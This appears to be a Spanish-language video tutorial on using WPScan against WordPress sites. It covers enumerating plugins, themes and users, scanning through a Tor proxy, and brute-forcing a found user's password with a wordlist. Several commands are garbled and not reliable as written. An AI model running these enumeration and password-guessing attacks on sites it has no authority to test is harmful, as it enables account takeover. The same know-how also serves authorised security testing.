Hola amigos, traigo este tutorial de wpscaan.
primero tenemos que abrir una terminal
después aplicamos los siguientes comandos :
apt-get update
apt-get install
esperamos el tiempo que sea necesario,
al finalizar escribimos el siguiente comando
wpscan , y se abrirá la lista de cosas que puedes hacer on wpscan
corre el siguiente comando : wpscan -, update
después , aplicamos
wpscan - -url tusitio.com para hacer un escaneo no intensivo del sitio.
para encontrar vulnerabilidad de los plugins
wpscan -- url tusítio.com url tusítio.com --enumerate p
-Encontrar temas ...
wpscan - - url tusítio.com url tusítio.com --enumerate t
-Encontrar users ...
wpscan -- url tusítio.com url tusítio.com --enumerate u
-Encontrar timthumbs ...
wpscan -- url tusítio.com url tusítio.com --enumerate tt
-tambien podemos usar proxies ...
wpscan -- url tusítio.com url tusítio.com --proxy 127.0.0.1:8118
para esto recuerda que debes de tener instalado tor y la configuración necesaria para usar proxichains ó listas de proxis, próximamente haré un Vídeo sobre esto, espéralo!.
bueno vamos a la papa del asunto
wpscan -- url tusítio.com url tusítio.com --enumerate u
encontraremos usuarios -
necesitaremos una lista de contraseñas esta las pueden encontrar en mi blog que pongo en la descripción
después haremos el siguiente comando ya que tengamos nuestra lista de contraseñas en el escritorio.
wpscan -- url tusítio.com url tusítio.com -- wordlist /root/Desktop/tucarpeta/list.txt -- - - username tu username o el username que encontramos -- threads 50, o las contraseñas que tengas disponible
te recomiendo que no hagas tantas de una sola vez porque se cae el servidor y eso no es bueno para el pentesting.
al final si encontro la contraseña te lo mostrara en un pequeño cuadrito.
por razones de seguridad no mostrare el final de el test, pero la información a ya esta completa, espero que le des un buen uso ya sea para proteger tus sítios web ó los de tu empresa ó el de un amigo.
Saludos, Pequeños Malvados! .
Suscríbete, comeénta y no olvides dar laike, nos vemos hasta la próxima.